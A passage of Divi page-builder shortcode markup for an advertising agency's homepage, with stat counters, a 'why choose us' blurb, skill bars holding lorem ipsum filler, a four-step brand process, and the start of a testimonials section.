Problems</span></h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||\" text_text_color=\"#353740\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p>Ideas are relevant if it has power to solve the real problem at hand. We are always keen on working practical ideas in the realtime business atmosphere.</p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_4,1_4,1_4,1_4\" admin_label=\"Fun Fact\" _builder_version=\"3.25\" custom_margin=\"|||\" custom_padding=\"40px||40px|\" animation_style=\"zoom\" animation_direction=\"top\" animation_intensity_zoom=\"10%\"][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_number_counter title=\"Projects\" number=\"350\" percent_sign=\"off\" _builder_version=\"4.4.9\" title_font=\"Montserrat|||on|\" title_text_color=\"#353740\" number_font=\"Montserrat|on|||\" number_text_color=\"#ffffff\" number_font_size=\"60px\" number_line_height=\"90px\" animation_style=\"zoom\"][/et_pb_number_counter][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_number_counter title=\"Satisfied Clients\" number=\"62\" percent_sign=\"off\" _builder_version=\"4.4.9\" title_font=\"Montserrat|||on|\" title_text_color=\"#353740\" number_font=\"Montserrat|on|||\" number_text_color=\"#ffffff\" number_font_size=\"60px\" number_line_height=\"90px\" animation_style=\"zoom\" animation_delay=\"100ms\"][/et_pb_number_counter][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_number_counter title=\"Ongoing Projects\" number=\"16\" percent_sign=\"off\" _builder_version=\"4.4.9\" title_font=\"Montserrat|||on|\" title_text_color=\"#353740\" number_font=\"Montserrat|on|||\" number_text_color=\"#ffffff\" number_font_size=\"60px\" number_line_height=\"90px\" animation_style=\"zoom\" animation_delay=\"200ms\"][/et_pb_number_counter][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_number_counter title=\"Cups Of Coffee\" number=\"906\" percent_sign=\"off\" _builder_version=\"4.4.9\" title_font=\"Montserrat|||on|\" title_text_color=\"#353740\" number_font=\"Montserrat|on|||\" number_text_color=\"#ffffff\" number_font_size=\"60px\" number_line_height=\"90px\" animation_style=\"zoom\" animation_delay=\"300ms\"][/et_pb_number_counter][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Feature Section\" _builder_version=\"4.4.9\" custom_margin=\"|||\" custom_padding=\"50px||3px||false|false\"][et_pb_row column_structure=\"1_2,1_2\" use_custom_gutter=\"on\" gutter_width=\"4\" custom_padding_last_edited=\"on|phone\" admin_label=\"Feature\" module_class=\" et_pb_row_fullwidth\" _builder_version=\"4.5.1\" width=\"86%\" width_tablet=\"80%\" width_phone=\"\" width_last_edited=\"on|desktop\" max_width=\"86%\" max_width_tablet=\"80%\" max_width_phone=\"\" max_width_last_edited=\"on|desktop\" custom_padding=\"40px||23px||false|false\" custom_padding_tablet=\"\" custom_padding_phone=\"0px||||false|false\" make_fullwidth=\"on\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/Why-we.png\" alt=\"creative advertising agency\" title_text=\"Why we\" force_fullwidth=\"on\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"4.5.2\" custom_margin=\"61px|||||\" custom_margin_tablet=\"\" custom_margin_phone=\"0px||||false|false\" custom_margin_last_edited=\"on|phone\" animation_style=\"slide\" animation_direction=\"right\" animation_intensity_slide=\"8%\" animation_starting_opacity=\"100%\" hover_enabled=\"0\"][/et_pb_image][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"7%||7%|\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_text_align=\"left\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" max_width=\"700px\" module_alignment=\"left\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\" locked=\"off\"]<h2><span>Why choose us?</span></h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" max_width=\"700px\" module_alignment=\"left\" custom_margin=\"|||\" custom_padding=\"||20px|\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\" locked=\"off\"]<p><span>WhatTheHell? is not some advertising, digital and design agency. An irreverent ideas farm seems more like it. Always eager to work with people who are looking to do brilliant things to their brands.</span></p>\n<p> <span>We help in realizing brand aspirations through our in-depth research &amp; analytics and translate them into irreverent creative ideas. We always remember that there’s more to marketing communication than top-funnel awareness building through BTL, ATL, Outdoor, or Digital Media Publishing.</span></p>[/et_pb_text][et_pb_button button_url=\"#\" button_text=\"Learn More\" _builder_version=\"3.16\" custom_button=\"on\" button_text_color=\"#747d88\" button_border_width=\"4px\" button_border_color=\"#747d88\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" button_icon_color=\"#747d88\" animation_style=\"flip\" animation_direction=\"right\" animation_intensity_flip=\"20%\" button_text_color_hover=\"#747d88\" button_border_color_hover=\"#747d88\" button_letter_spacing_hover=\"2px\" button_bg_color_hover=\"rgba(0,0,0,0)\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"on\" button_text_color__hover=\"#747d88\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"on\" button_border_color__hover=\"#747d88\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"on\" button_letter_spacing__hover=\"2px\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"on\" button_bg_color__hover=\"rgba(0,0,0,0)\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Latest Work Section\" _builder_version=\"4.4.9\" background_color=\"#f7f7f7\" custom_padding=\"50px||50px||false|false\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"|auto|2px|auto||\" animation_style=\"fade\" animation_direction=\"top\" saved_tabs=\"all\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>Our Latest Work</h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p><span>Creative &amp; Effective work around practical marketing problems. Next update will have your creatives.</span></p>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" make_equal=\"on\" use_custom_gutter=\"on\" gutter_width=\"1\" specialty=\"on\" padding_top_1=\"0px\" admin_label=\"Work Section\" module_class=\" et_pb_specialty_fullwidth\" _builder_version=\"3.22\" background_color=\"#f7f7f7\" inner_width=\"100%\" inner_width_tablet=\"100%\" inner_width_phone=\"\" inner_width_last_edited=\"on|desktop\" inner_max_width=\"100%\" inner_max_width_tablet=\"100%\" inner_max_width_phone=\"\" inner_max_width_last_edited=\"on|desktop\" custom_padding=\"0px|5%|0px|5%\" make_fullwidth=\"on\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" padding_top__hover=\"0px\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/800x800-w.jpg\" title_text=\"800x800 w\" url=\"#\" force_fullwidth=\"on\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"4.5.2\" animation_style=\"flip\" animation_intensity_flip=\"30%\" hover_enabled=\"0\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"10px\" box_shadow_color=\"#f7f7f7\"][/et_pb_image][/et_pb_column][et_pb_column type=\"1_2\" specialty_columns=\"2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_row_inner _builder_version=\"3.25\" custom_padding=\"0px||0px|\"][et_pb_column_inner saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/800x400.jpg\" title_text=\"800x400\" url=\"#\" force_fullwidth=\"on\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"4.5.2\" animation_style=\"flip\" animation_direction=\"right\" animation_intensity_flip=\"30%\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"10px\" box_shadow_color=\"#f7f7f7\"][/et_pb_image][/et_pb_column_inner][/et_pb_row_inner][et_pb_row_inner column_structure=\"1_2,1_2\" _builder_version=\"4.5.2\" custom_margin=\"||||false|false\" custom_padding=\"0px||0px|\"][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/800x800..1.jpg\" title_text=\"800x800..1\" url=\"#\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"4.5.2\" animation_style=\"flip\" animation_direction=\"right\" animation_intensity_flip=\"30%\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"10px\" box_shadow_color=\"#f7f7f7\"][/et_pb_image][/et_pb_column_inner][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/800x800.jpg\" title_text=\"800x800\" url=\"#\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"4.5.2\" animation_style=\"flip\" animation_intensity_flip=\"30%\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"10px\" box_shadow_color=\"#f7f7f7\"][/et_pb_image][/et_pb_column_inner][/et_pb_row_inner][/et_pb_column][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Button Section\" _builder_version=\"4.4.9\" background_color=\"#f7f7f7\" custom_padding=\"0px||50px||false|false\"][et_pb_row _builder_version=\"3.25\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_button button_url=\"#\" button_text=\"See More\" button_alignment=\"center\" _builder_version=\"3.16\" custom_button=\"on\" button_text_color=\"#747d88\" button_border_width=\"4px\" button_border_color=\"#747d88\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" button_icon_color=\"#747d88\" animation_style=\"flip\" animation_direction=\"right\" animation_intensity_flip=\"20%\" button_text_color_hover=\"#747d88\" button_border_color_hover=\"#747d88\" button_letter_spacing_hover=\"2px\" button_bg_color_hover=\"rgba(0,0,0,0)\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"on\" button_text_color__hover=\"#747d88\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"on\" button_border_color__hover=\"#747d88\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"on\" button_letter_spacing__hover=\"2px\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"on\" button_bg_color__hover=\"rgba(0,0,0,0)\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Skill Section\" _builder_version=\"4.4.9\" custom_padding=\"50px||50px||false|false\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" saved_tabs=\"all\" locked=\"off\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>Our Skills</h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.5.1\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p>We have a dedicated team to build new tools and technique, to complete the day today repetitive work with precision.</p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_2,1_2\" admin_label=\"Skill\" _builder_version=\"3.25\" custom_padding=\"20px||10px|\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"3.27.4\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" custom_margin=\"|||\" custom_padding=\"||20px|\" animation_style=\"flip\" animation_intensity_flip=\"20%\" hover_enabled=\"0\"]Lorem Ipsum is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry\'s standard dummy text ever since the 1500s, when an unknown printer took a galley of type and scrambled it to make a type specimen book. It is a long established fact that a reader. It was popularised in the 1960s with the release.\r[/et_pb_text][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_counters bar_bg_color=\"#d4b068\" use_percentages=\"off\" _builder_version=\"4.4.9\" title_font=\"Montserrat|||on|||||\" title_text_color=\"#353740\" title_font_size=\"12px\" title_letter_spacing=\"1px\" title_line_height=\"2em\" percent_font_size=\"1px\" custom_padding=\"|||\" animation_style=\"fold\" animation_direction=\"left\" animation_intensity_fold=\"30%\" hover_enabled=\"0\"][et_pb_counter percent=\"90\" _builder_version=\"3.0.83\" title_font=\"||||||||\" percent_font=\"||||\" background_color=\"#ececee\" custom_margin=\"||35px|\" custom_padding=\"|||\" background_enable_color_default=\"on\" parallax_default=\"off\" parallax_method_default=\"on\" bar_background_color_default=\"#d4b068\" use_percentages=\"off\" allow_player_pause_default=\"off\"]Branding - 90%\r[/et_pb_counter][et_pb_counter percent=\"77\" _builder_version=\"3.0.83\" title_font=\"||||||||\" percent_font=\"||||\" background_color=\"#ececee\" custom_margin=\"||35px|\" custom_padding=\"|||\" background_enable_color_default=\"on\" parallax_default=\"off\" parallax_method_default=\"on\" bar_background_color_default=\"#d4b068\" use_percentages=\"off\" allow_player_pause_default=\"off\"]Lead/Sales Generation Campaign - 77%\r[/et_pb_counter][et_pb_counter percent=\"85%\" _builder_version=\"3.0.83\" title_font=\"||||||||\" percent_font=\"||||\" background_color=\"#ececee\" custom_margin=\"||35px|\" custom_padding=\"|||\" background_enable_color_default=\"on\" parallax_default=\"off\" parallax_method_default=\"on\" bar_background_color_default=\"#d4b068\" use_percentages=\"off\" allow_player_pause_default=\"off\"]Digital Advertising - 85%\r[/et_pb_counter][/et_pb_counters][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Gradient Background Color Section\" _builder_version=\"4.5.2\" background_color_gradient_direction=\"90deg\" background_image=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/Artboard-4.png\" custom_margin=\"||78px|\" custom_margin_tablet=\"||0px|\" custom_margin_phone=\"\" custom_margin_last_edited=\"on|phone\" custom_padding=\"10%||0px|\"][et_pb_row _builder_version=\"3.25\" custom_padding=\"0px|0px|0px|0px\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/Artboard-Copy-12.png\" alt=\"Advertising agency in delhi\" title_text=\"Advertising agency in delhi\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"4.5.2\" custom_margin=\"||-56px|\" custom_margin_tablet=\"||10%|\" custom_margin_phone=\"\" custom_margin_last_edited=\"on|phone\" custom_padding=\"|||\" animation_style=\"slide\" animation_direction=\"left\" animation_duration=\"1500ms\" animation_intensity_slide=\"10%\" animation_starting_opacity=\"100%\" hover_enabled=\"0\" locked=\"off\"][/et_pb_image][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Quote Section\" _builder_version=\"3.22\" custom_margin=\"40px||50px|\"][et_pb_row admin_label=\"Quote\" _builder_version=\"3.25\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Quote\" _builder_version=\"4.5.2\" text_text_color=\"#747d88\" text_font_size=\"24px\" text_line_height=\"1.8em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"flip\" animation_direction=\"top\" animation_intensity_flip=\"20%\"]<p>NOBODY READS ADS, PEOPLE READ WHAT INTERESTS THEM &amp; SOMETIME IT\'S AN AD</p>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" make_equal=\"on\" use_custom_gutter=\"on\" gutter_width=\"1\" specialty=\"on\" padding_top_1=\"140px\" padding_top_2=\"0px\" padding_left_1=\"10%\" admin_label=\"Feature Section\" module_class=\" et_pb_specialty_fullwidth\" _builder_version=\"3.22\" background_color=\"#f7f7f7\" inner_width=\"100%\" inner_width_tablet=\"100%\" inner_width_phone=\"\" inner_width_last_edited=\"on|desktop\" inner_max_width=\"100%\" inner_max_width_tablet=\"100%\" inner_max_width_phone=\"\" inner_max_width_last_edited=\"on|desktop\" custom_margin=\"|||\" custom_padding=\"0px||3px|||\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"100px\" box_shadow_color=\"#ffffff\" make_fullwidth=\"on\"][et_pb_column type=\"1_2\" specialty_columns=\"2\" _builder_version=\"3.25\" custom_padding=\"|||\" padding_left__hover=\"10%\" padding_top__hover=\"140px\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_row_inner use_custom_gutter=\"on\" make_equal=\"on\" admin_label=\"Feature Titile\" _builder_version=\"3.25\" max_width=\"75%\" custom_margin=\"|||\" custom_padding=\"||10px|\"][et_pb_column_inner saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_text_align=\"left\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" max_width=\"700px\" module_alignment=\"left\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\" locked=\"off\"]<h2><span>Easy to start</span></h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" max_width=\"700px\" module_alignment=\"left\" custom_margin=\"|||\" custom_padding=\"||20px|\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\" locked=\"off\"]<div class=\"lp-element lp-pom-text nlh\" id=\"lp-pom-text-216\">\n<p><strong><em>Just four steps</em></strong></p>\n<p><strong><em></em></strong></p>\n</div>\n<div class=\"lp-element lp-pom-text nlh\" id=\"lp-pom-text-217\">\n<p>We had adopted proven workflow to produce consistent result, but never hesitate to cross the lines and work differently.</p>\n</div>[/et_pb_text][/et_pb_column_inner][/et_pb_row_inner][et_pb_row_inner column_structure=\"1_2,1_2\" use_custom_gutter=\"on\" make_equal=\"on\" admin_label=\"Features\" _builder_version=\"3.25\" width=\"100%\" max_width=\"75%\" custom_margin=\"|||\" custom_padding=\"|0px|4px|||\"][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"01. BRAND AUDIT\" use_icon=\"on\" font_icon=\"%%57%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"48px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_margin=\"||26px|||\" animation_style=\"fade\" animation_direction=\"bottom\"]<p style=\"text-align: center;\"><span>Analyzing the brand with all the key parameter (As per operating environment and competition)</span></p>[/et_pb_blurb][/et_pb_column_inner][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"02. STRATEGY\" use_icon=\"on\" font_icon=\"%%369%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"48px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" width=\"98.9%\" custom_margin=\"||26px||false|false\" custom_padding=\"||||false|false\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"20%\"]<p><span>Starting with the summary of the plan, Defining TG, Writing/Creating USP</span></p>\n<p><span></span></p>[/et_pb_blurb][/et_pb_column_inner][/et_pb_row_inner][et_pb_row_inner column_structure=\"1_2,1_2\" use_custom_gutter=\"on\" make_equal=\"on\" admin_label=\"Features\" _builder_version=\"3.25\" width=\"100%\" max_width=\"75%\" custom_margin=\"|||\" custom_padding=\"|0px||||\"][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"03. EXECUTION\" use_icon=\"on\" font_icon=\"%%57%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"48px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_margin=\"||26px|||\" animation_style=\"fade\" animation_direction=\"bottom\"]<div><span>Creative Development, Setting up the visual identity, implementing the IMC(Integrated Marketing Communication)</span></div>[/et_pb_blurb][/et_pb_column_inner][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"04. EVALUATION\" use_icon=\"on\" font_icon=\"%%369%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"48px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" width=\"98.9%\" custom_margin=\"||43px||false|false\" custom_padding=\"||||false|false\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"20%\"]<div dir=\"ltr\"><span>The fourth but the most important step is evaluation, adaptation and reporting. To improvise future performance.</span></div>\n<p><span></span></p>[/et_pb_blurb][/et_pb_column_inner][/et_pb_row_inner][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" padding_top__hover=\"0px\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/Artboard-5.jpg\" alt=\"marketing strategy for success\" title_text=\"marketing strategy for success\" force_fullwidth=\"on\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"4.5.2\" custom_margin=\"|||\" custom_padding=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"6%\" animation_starting_opacity=\"100%\" hover_enabled=\"0\"][/et_pb_image][/et_pb_column][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Testimonial Section\" _builder_version=\"3.22\" custom_margin=\"|||\" custom_padding=\"50px||50px|||\"][et_pb_row admin_label=\"Testimonial Title\" _builder_version=\"3.25\" custom_margin=\"|||\" animation_style=\"fade\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"3.27.4\" text_font=\"Montserrat|on||on|\" text_text_color=\"#353740\" text_font_size=\"42px\" text_line_height=\"1.2em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\"]<p>From Our Clients</p>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.5.2\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" text_orientation=\"center\" max_width=\"600px\" module_alignment=\"center\" custom_margin=\"|||\"]<p>Best Advertising Is Done By Satisfied Customers. We Believe &amp; Nurture It In Our Business.</p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_2,1_2\" admin_label=\"Testimonial\" _builder_version=\"3.25\" custom_padding=\"|||\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_testimonial author=\"Mitch Skolnik\" job_title=\"operation Director\" company_name=\"Elegant Themes\" portrait_url=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/portraits-circle-small_2.png\" 